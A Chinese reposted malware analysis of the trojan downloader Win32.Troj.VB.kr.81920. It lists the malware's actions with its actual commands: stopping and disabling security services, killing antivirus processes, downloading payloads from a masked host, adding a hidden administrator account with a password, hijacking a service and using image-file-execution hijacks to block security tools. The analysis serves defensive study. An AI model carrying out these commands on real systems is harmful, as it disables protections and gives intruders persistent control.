鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站制作教程 > vbs > >

Win32.Troj.VB.kr.81920

来源:互联网 作者:佚名 时间:2015-10-15 13:41
病毒名称(中文):延迟下载器81920 病毒别名: 威胁级别:★☆☆☆☆ 病毒类型:木马下载器 病毒长度:81920 影响系统:Win9xWinMeWinNTWin2000WinXPWin2003 病毒行为: 这是个木马下载器。它会将自己设为治理员权限,映像劫持大量的杀毒软件。然后从指定网址下载大
病毒名称(中文): 延迟下载器81920
病毒别名:
威胁级别: ★☆☆☆☆
病毒类型: 木马下载器
病毒长度: 81920
影响系统: Win9xWinMeWinNTWin2000WinXPWin2003



病毒行为:

这是个木马下载器。它会将自己设为治理员权限,映像劫持大量的杀毒软件。然后从指定网址下载大量其它木马程序。

1.运行后首先Sleep(),挂起10分钟。然后下载病毒列表。

2.cacls.exeC:\Windows\system32\cmd.exe/e/t/geveryone:F
更改cmd权限为所有用户可以执行
执行cmd.exe/cnetstopwscsvc&
netstopsharedaccess&
scconfigsharedaccessstart=disabled&
scconfigwscsvcstart=disabled&
netstopKPfwSvc&
netstopKWatchsvc&
netstopMcShield&
netstop"NortonAntiVirusServer
终止或禁用一些服务

3.查找并终止以下进程shstat.exe,runiep.exe,ras.exe,MPG4C32.exe,
imsins.exe,iparmor.exe,360safe.exe,360tray.exe,kmailmon.exe,
kavstart.exe,cacls.exe,cmd.exe。

4.查找杀软ccenter.exe,假如找到下载
http://ps.go****o.com/rc/1500/rav.jpg
保存到C:\windows\system32\rav.exe执行。
rav.exe会生成C:\windows\system32\ressdt.exe
注册ressdt.sys驱动,恢复ssdt,然后delressdt.exe

5.读取http://ps.go****o.com/rc/1500/gx.txt
下载的病毒列表,并执行,实际读出的是0。下载http://ps.go****o.com/rc/1500/gx.jpg
到本地C:\windows\system32\vbb.exe并执行,这个vbb.exe会下载一些其他的病毒。

6.写入注册表自启动
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run\SoundMan
删除一下注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run\
360Safetray
KavPFW
vptray
runeip
RavTask
RfwMain
kav

7.添加一个用户new1密码12369到治理员组
cmd.exe/cnetusernew112369/add&
netusernew112369&
netusernew1/active:yes&
netlocalgroupadministratorsnew1/add

8.通过写入一个1.inf的文件并执行,注册为服务启动,替换原系统服务键值
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Service\helpsvc
原键值%SystemRoot%\System32\svchost.exe-knetsvcs
为%SystemRoot%\System32\interne.exe

其执行的语句如下:
cmd/cecho[Version]>%windir%\1.inf&
echoSignature="$WINDOWSNT$">>%windir%\1.inf&
echo[DefaultInstall.Services]>>%windir%\1.inf&
...
(略去数行)

9.新建键值
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1=0

10.映像劫持,导致一些安全工具打不开。
把HKLM\SoftWare\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\
cftmon.exe\debugger=soundman.exe
360tray.exe=svchost.exe
360safe.exe=svchost.exe
360Loader.exe=svchost.exe
kmailmon=svchost.exe
IceSWord=svchost.exe
runiep=svchost.exe
ras=svchost.exe
Iparamor.exe=svchost.exe
taskmgr.exe=svchost.exe

11.屏蔽隐藏文件的选项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue







网友评论
<